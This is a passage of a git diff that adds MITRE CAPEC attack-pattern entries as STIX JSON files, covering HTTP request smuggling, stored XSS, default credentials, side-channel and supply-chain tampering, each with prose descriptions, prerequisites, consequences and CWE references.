+ "Medium": "Attacker identifies known local files to exploit" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--21c7f7fe-73bf-40a8-8d85-c38596237db2.json b/capec/attack-pattern/attack-pattern--21c7f7fe-73bf-40a8-8d85-c38596237db2.json new file mode 100644 index 0000000000..bdb3659f1e --- /dev/null +++ b/capec/attack-pattern/attack-pattern--21c7f7fe-73bf-40a8-8d85-c38596237db2.json @@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--2ef7078a-7654-4326-b0bf-0269377aa0ee", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--21c7f7fe-73bf-40a8-8d85-c38596237db2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Target Influence via Interview and Interrogation", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/434.html", + "external_id": "CAPEC-434" + }, + { + "source_name": "reference_from_CAPEC", + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "url": "http://www.social-engineer.org", + "external_id": "REF-348" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--21ff93ae-e3a3-43ff-8cc4-44614e2604e4.json b/capec/attack-pattern/attack-pattern--21ff93ae-e3a3-43ff-8cc4-44614e2604e4.json new file mode 100644 index 0000000000..3e82072c55 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--21ff93ae-e3a3-43ff-8cc4-44614e2604e4.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--c4e97bad-09e6-42cf-8a89-0b56cc12b6a9", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--21ff93ae-e3a3-43ff-8cc4-44614e2604e4", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Documentation Alteration to Cause Errors in System Design", + "description": "An attacker with access to a manufacturer's documentation containing requirements allocation and software design processes maliciously alters the documentation in order to cause errors in system design. This allows the attacker to take advantage of a weakness in a deployed system of the manufacturer for malicious purposes.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/519.html", + "external_id": "CAPEC-519" + }, + { + "source_name": "reference_from_CAPEC", + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf", + "external_id": "REF-439" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_example_instances": [ + "During operation, a firewall will restart various subsystems to reload and implement new rules as added by the user. An attacker alters the software design dependencies in the manufacturer's documentation so that under certain predictable conditions the reload will fail to load in rules resulting in a \"fail open\" state. Once deployed at a victim site, this will allow the attacker to bypass the victim's firewall." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge of software capabilities of a manufacturer's product.", + "Access to the manufacturer's documentation." + ], + "x_capec_skills_required": { + "High": "Ability to stealthly gain access via remote compromise or physical access to the manufacturer's documentation." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--221c647a-ae2b-4c2b-b762-17727f367bbe.json b/capec/attack-pattern/attack-pattern--221c647a-ae2b-4c2b-b762-17727f367bbe.json new file mode 100644 index 0000000000..90fb8dd181 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--221c647a-ae2b-4c2b-b762-17727f367bbe.json @@ -0,0 +1,66 @@ +{ + "type": "bundle", + "id": "bundle--8aef00eb-8033-4bb3-9007-189cd6232658", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--221c647a-ae2b-4c2b-b762-17727f367bbe", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Transaction or Event Tampering via Application API Manipulation", + "description": "An attacker hosts or joins an event or transaction within an application framework in order to change the content of messages or items that are being exchanged. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that look authentic but may contain deceptive links, substitute one item or another, spoof an existing item and conduct a false exchange, or otherwise change the amounts or identity of what is being exchanged. The techniques require use of specialized software that allow the attacker to man-in-the-middle communications between the web browser and the remote system in order to change the content of various application elements. Often, items exchanged in game can be monetized via sales for coin, virtual dollars, etc. The purpose of the attack is for the attack to scam the victim by trapping the data packets involved the exchange and altering the integrity of the transfer process.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/385.html", + "external_id": "CAPEC-385" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/471.html", + "external_id": "CWE-471" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html", + "external_id": "CWE-345" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html", + "external_id": "CWE-346" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html", + "external_id": "CWE-602" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html", + "external_id": "CWE-311" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18", + "external_id": "REF-327" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "Targeted software is utilizing application framework APIs" + ], + "x_capec_resources_required": [ + "A software program that allows a user to man-in-the-middle communications between the client and server, such as a man-in-the-middle proxy." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--222cae7b-e00f-48e2-813a-efac031dfa65.json b/capec/attack-pattern/attack-pattern--222cae7b-e00f-48e2-813a-efac031dfa65.json new file mode 100644 index 0000000000..6d03e2d0e6 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--222cae7b-e00f-48e2-813a-efac031dfa65.json @@ -0,0 +1,79 @@ +{ + "type": "bundle", + "id": "bundle--1d807b82-9097-42b9-8679-a87a38d825d9", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--222cae7b-e00f-48e2-813a-efac031dfa65", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "HTTP Request Smuggling", + "description": "HTTP Request Smuggling results from the discrepancies in parsing HTTP requests between HTTP entities such as web caching proxies or application firewalls. Entities such as web servers, web caching proxies, application firewalls or simple proxies often parse HTTP requests in slightly different ways. Under specific situations where there are two or more such entities in the path of the HTTP request, a specially crafted request is seen by two attacked entities as two different sets of requests. This allows certain requests to be smuggled through to a second entity without the first one realizing it.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/33.html", + "external_id": "CAPEC-33" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/444.html", + "external_id": "CWE-444" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/436.html", + "external_id": "CWE-436" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html", + "external_id": "CWE-707" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_example_instances": [ + "When using Sun Java System Web Proxy Server 3.x or 4.x in conjunction with Sun ONE/iPlanet 6.x, Sun Java System Application Server 7.x or 8.x, it is possible to bypass certain application firewall protections, hijack web sessions, perform Cross Site Scripting or poison the web proxy cache using HTTP Request Smuggling. Differences in the way HTTP requests are parsed by the Proxy Server and the Application Server enable malicious requests to be smuggled through to the Application Server, thereby exposing the Application Server to aforementioned attacks. See also: CVE-2006-6276", + "Apache server 2.0.45 and version before 1.3.34, when used as a proxy, easily lead to web cache poisoning and bypassing of application firewall restrictions because of non-standard HTTP behavior. Although the HTTP/1.1 specification clearly states that a request with both \"Content-Length\" and a \"Transfer-Encoding: chunked\" headers is invalid, vulnerable versions of Apache accept such requests and reassemble the ones with \"Transfer-Encoding: chunked\" header without replacing the existing \"Content-Length\" header or adding its own. This leads to HTTP Request Smuggling using a request with a chunked body and a header with \"Content-Length: 0\". See also: CVE-2005-2088" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "An additional HTTP entity such as an application firewall or a web caching proxy between the attacker and the second entity such as a web server", + "Differences in the way the two HTTP entities parse HTTP requests" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "The attacker has to have detailed knowledge of the HTTP protocol specifics and must also possess exact details on the discrepancies between the two targeted entities in parsing HTTP requests." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--22a69d93-b99a-41c0-b7a6-2a1875317986.json b/capec/attack-pattern/attack-pattern--22a69d93-b99a-41c0-b7a6-2a1875317986.json new file mode 100644 index 0000000000..b774144307 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--22a69d93-b99a-41c0-b7a6-2a1875317986.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--2b5fea7e-973c-4c13-a4c9-1bb7492e4d83", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--22a69d93-b99a-41c0-b7a6-2a1875317986", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "DEPRECATED: Bypassing Card or Badge-Based Systems", + "description": "This attack pattern has been deprecated as it a generalization of CAPEC-397: Cloning Magnetic Strip Cards, CAPEC-398: Magnetic Strip Card Brute Force Attacks, CAPEC-399: Cloning RFID Cards or Chips and CAPEC-400: RFID Chip Deactivation or Destruction. Please refer to these CAPECs going forward.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/396.html", + "external_id": "CAPEC-396" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--2372b712-3a94-46d5-86d4-67d489cdbf95.json b/capec/attack-pattern/attack-pattern--2372b712-3a94-46d5-86d4-67d489cdbf95.json new file mode 100644 index 0000000000..7551ea60f8 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--2372b712-3a94-46d5-86d4-67d489cdbf95.json @@ -0,0 +1,80 @@ +{ + "type": "bundle", + "id": "bundle--00038b2c-bd50-405e-8b45-ec63c31e6178", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--2372b712-3a94-46d5-86d4-67d489cdbf95", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Try Common or Default Usernames and Passwords", + "description": "An adversary may try certain common or default usernames and passwords to gain access into the system and perform unauthorized actions. An adversary may try an intelligent brute force using empty passwords, known vendor default credentials, as well as a dictionary of common usernames and passwords. Many vendor products come preconfigured with default (and thus well-known) usernames and passwords that should be deleted prior to usage in a production environment. It is a common mistake to forget to remove these default login credentials. Another problem is that users would pick very simple (common) passwords (e.g. \"secret\" or \"password\") that make it easier for the attacker to gain access to the system compared to using a brute force attack or even a dictionary attack using a full dictionary.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/70.html", + "external_id": "CAPEC-70" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html", + "external_id": "CWE-521" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html", + "external_id": "CWE-262" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html", + "external_id": "CWE-263" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/798.html", + "external_id": "CWE-798" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html", + "external_id": "CWE-693" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_example_instances": [ + "User Bob sets his password to \"123\" or literally leaves his password blank. If the system does not have password strength enforcement against a sound password policy, this password may be admitted. Passwords like these two examples are two simple and common passwords that are easily able to be guessed by the adversary.", + "Cisco 2700 Series Wireless Location Appliances (version 2.1.34.0 and earlier) have a default administrator username \"root\" with a password \"password\". This allows remote attackers to easily obtain administrative privileges. See also: CVE-2006-5288" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The system uses one factor password based authentication.The adversary has the means to interact with the system." + ], + "x_capec_resources_required": [ + "Technology or vendor specific list of default usernames and passwords." + ], + "x_capec_skills_required": { + "Low": "An adversary just needs to gain access to common default usernames/passwords specific to the technologies used by the system. Additionally, a brute force attack leveraging common passwords can be easily realized if the user name is known." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--23ef3396-6a77-4f83-9d9f-7ed7760f35b1.json b/capec/attack-pattern/attack-pattern--23ef3396-6a77-4f83-9d9f-7ed7760f35b1.json new file mode 100644 index 0000000000..33d854ae18 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--23ef3396-6a77-4f83-9d9f-7ed7760f35b1.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--dbd538ab-7bf7-4b0d-a070-cc6dc89aad7a", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--23ef3396-6a77-4f83-9d9f-7ed7760f35b1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Electromagnetic Side-Channel Attack", + "description": "In this attack scenario, the attacker passively monitors electromagnetic emanations that are produced by the targeted electronic device as an unintentional side-effect of its processing. From these emanations, the attacker derives information about the data that is being processed (e.g. the attacker can recover cryptographic keys by monitoring emanations associated with cryptographic processing). This style of attack requires proximal access to the device, however attacks have been demonstrated at public conferences that work at distances of up to 10-15 feet. There have not been any significant studies to determine the maximum practical distance for such attacks. Since the attack is passive, it is nearly impossible to detect and the targeted device will continue to operate as normal after a successful attack.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/622.html", + "external_id": "CAPEC-622" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html", + "external_id": "CWE-201" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Derive sensitive information about encrypted data. For mobile devices, depending on which keys are compromised, the attacker may be able to decrypt VOIP communications, impersonate the targeted caller, or access the enterprise VPN server.)" + ] + }, + "x_capec_prerequisites": [ + "Proximal access to the device." + ], + "x_capec_skills_required": { + "Medium": "Sophisticated attack, but detailed techniques published in the open literature." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--24db550f-2f72-42a7-ba11-0050f9180eaa.json b/capec/attack-pattern/attack-pattern--24db550f-2f72-42a7-ba11-0050f9180eaa.json new file mode 100644 index 0000000000..4ddd46c013 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--24db550f-2f72-42a7-ba11-0050f9180eaa.json @@ -0,0 +1,42 @@ +{ + "type": "bundle", + "id": "bundle--4f77aa3b-eb8d-45e9-8754-a4ce16bfd1ab", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--24db550f-2f72-42a7-ba11-0050f9180eaa", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Cellular Data Injection", + "description": "Adversaries inject data into mobile technology traffic (data flows or signaling data) to disrupt communications or conduct additional surveillance operations.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/610.html", + "external_id": "CAPEC-610" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (Attackers can disrupt or deny mobile technology communications and operations.)", + "Modify Data (Attackers can inject false data into data or signaling system data flows of communications and operations, or re-route data flows or signaling data for the purpose of further data intercept and capture.)" + ] + }, + "x_capec_prerequisites": [ + "None" + ], + "x_capec_skills_required": { + "High": "Often achieved by nation states in conjunction with commercial cellular providers to conduct cellular traffic intercept and possible traffic injection." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--256f9cab-9731-4aa5-9db0-b1c71b4e7377.json b/capec/attack-pattern/attack-pattern--256f9cab-9731-4aa5-9db0-b1c71b4e7377.json new file mode 100644 index 0000000000..37da9d3a34 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--256f9cab-9731-4aa5-9db0-b1c71b4e7377.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--7dfeb5e4-f8e2-4d80-bee5-78f0539e6044", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--256f9cab-9731-4aa5-9db0-b1c71b4e7377", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Linux Terminal Injection", + "description": "This attack pattern has been deprecated as it is covered by \"CAPEC-40 : Manipulating Writeable Terminal Devices\". Please refer to this CAPEC going forward.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/249.html", + "external_id": "CAPEC-249" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--2639a852-3832-492a-b16c-0d568ecb8fa7.json b/capec/attack-pattern/attack-pattern--2639a852-3832-492a-b16c-0d568ecb8fa7.json new file mode 100644 index 0000000000..d2044bfa15 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--2639a852-3832-492a-b16c-0d568ecb8fa7.json @@ -0,0 +1,95 @@ +{ + "type": "bundle", + "id": "bundle--2de4352f-b764-4069-ae3e-97ec9ef3b6d0", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--2639a852-3832-492a-b16c-0d568ecb8fa7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Exploiting Trust in Client", + "description": "An attack of this type exploits vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by communicating directly with the server where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/22.html", + "external_id": "CAPEC-22" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html", + "external_id": "CWE-290" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html", + "external_id": "CWE-287" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html", + "external_id": "CWE-693" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_example_instances": [ + "Web applications may use JavaScript to perform client side validation, request encoding/formatting, and other security functions, which provides some usability benefits and eliminates some client-server round-tripping. However, the web server cannot assume that the requests it receives have been subject to those validations, because an attacker can use an alternate method for crafting the HTTP Request and submit data that contains poisoned values designed to spoof a user and/or get the web server to disclose information.", + "Web 2.0 style applications may be particularly vulnerable because they in large part rely on existing infrastructure which provides scalability without the ability to govern the clients. Attackers identify vulnerabilities that either assume the client side is responsible for some security services (without the requisite ability to ensure enforcement of these checks) and/or the lack of a hardened, default deny server configuration that allows for an attacker probing for weaknesses in unexpected ways. Client side validation, request formatting and other services may be performed, but these are strictly usability enhancements not security enhancements.", + "Many web applications use client side scripting like JavaScript to enforce authentication, authorization, session state and other variables, but at the end of day they all make requests to the server. These client side checks may provide usability and performance gains, but they lack integrity in terms of the http request. It is possible for an attacker to post variables directly to the server without using any of the client script security checks and customize the patterns to impersonate other users or probe for more information.", + "Many message oriented middleware systems like MQ Series are rely on information that is passed along with the message request for making authorization decisions, for example what group or role the request should be passed. However, if the message server does not or cannot authenticate the authorization information in the request then the server's policy decisions about authorization are trivial to subvert because the client process can simply elevate privilege by passing in elevated group or role information which the message server accepts and acts on." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Server software must rely on client side formatted and validated values, and not reinforce these checks on the server side." + ], + "x_capec_resources_required": [ + "Ability to communicate synchronously or asynchronously with server" + ], + "x_capec_skills_required": { + "Medium": "The attacker must have fairly detailed knowledge of the syntax and semantics of client/server communications protocols and grammars" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--263be634-9e77-4c0b-891f-26a625d3b25d.json b/capec/attack-pattern/attack-pattern--263be634-9e77-4c0b-891f-26a625d3b25d.json new file mode 100644 index 0000000000..284c9747de --- /dev/null +++ b/capec/attack-pattern/attack-pattern--263be634-9e77-4c0b-891f-26a625d3b25d.json @@ -0,0 +1,71 @@ +{ + "type": "bundle", + "id": "bundle--c597de69-e406-4b7f-9b02-64f0b2186e0b", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--263be634-9e77-4c0b-891f-26a625d3b25d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-04-15T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Stored XSS", + "description": "This type of attack is a form of Cross-site Scripting (XSS) where a malicious script is persistenly \"stored\" within the data storage of a vulnerable web application. Initially presented by an adversary to the vulnerable web application, the malicious script is incorrectly considered valid input and is not properly encoded by the web application. A victim is then convinced to use the web application in a way that creates a response that includes the malicious script. This response is subsequently sent to the victim and the malicious script is executed by the victim's browser. To launch a successful Stored XSS attack, an adversary looks for places where stored input data is used in the generation of a response. This often involves elements that are not expected to host scripts such as image tags (), or the addition of event attibutes such as onload and onmouseover. These elements are often not subject to the same input validation, output encoding, and other content filtering and checking routines.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/592.html", + "external_id": "CAPEC-592" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/79.html", + "external_id": "CWE-79" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges (A successful Stored XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)" + ], + "Authorization": [ + "Gain Privileges (A successful Stored XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)" + ], + "Availability": [ + "Execute Unauthorized Commands (A successful Stored XSS attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)" + ], + "Confidentiality": [ + "Read Data (A successful Stored XSS attack can enable an adversary to exfiltrate sensitive information from the application.)", + "Gain Privileges (A successful Stored XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)", + "Execute Unauthorized Commands (A successful Stored XSS attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (A successful Stored XSS attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)", + "Modify Data (A successful Stored XSS attack can allow an adversary to tamper with application data.)" + ] + }, + "x_capec_example_instances": [ + "An adversary determines that a system uses a web based interface for administration. The adversary creates a new user record and supplies a malicious script in the user name field. The user name field is not validated by the system and a new log entry is created detailing the creation of the new user. Later, an administrator reviews the log in the administrative console. When the administrator comes across the new user entry, the browser sees a script and executes it, stealing the administrator's authentication cookie and forwarding it to the adversary. An adversary then uses the received authentication cookie to log in to the system as an administrator, provided that the administrator console can be accessed remotely.", + "An online discussion forum allows its members to post HTML-enabled messages, which can also include image tags. An adversary embeds JavaScript in the image tags of his message. The adversary then sends the victim an email advertising free goods and provides a link to the form for how to collect. When the victim visits the forum and reads the message, the malicious script is executed within the victim's browser." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "An application that leverages a client-side web browser with scripting enabled.", + "An application that fails to adequately sanitize or encode untrusted input.", + "An application that stores information provided by the user in data storage of some kind." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "Requires the ability to write scripts of varying complexity and to inject them through user controlled fields within the application." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--2668fa09-0fe2-45ad-a8c0-7971d8223e6f.json b/capec/attack-pattern/attack-pattern--2668fa09-0fe2-45ad-a8c0-7971d8223e6f.json new file mode 100644 index 0000000000..8e6d243247 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--2668fa09-0fe2-45ad-a8c0-7971d8223e6f.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--3182e7c5-0470-49fb-a39e-fb01b5d7bee5", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--2668fa09-0fe2-45ad-a8c0-7971d8223e6f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Open Source Libraries Altered", + "description": "An attacker with access to an open source code project (OSS) and knowledge of its particular use for in a system being developed, manufactured, or supported for the victim, can insert malicious code into the open source software used for math libraries in anticipation of inclusion into the system for the purpose of disruption or further compromise within the victim organization.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/538.html", + "external_id": "CAPEC-538" + }, + { + "source_name": "reference_from_CAPEC", + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf", + "external_id": "REF-439" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_example_instances": [ + "An attacker with access to an open source code project introduces a 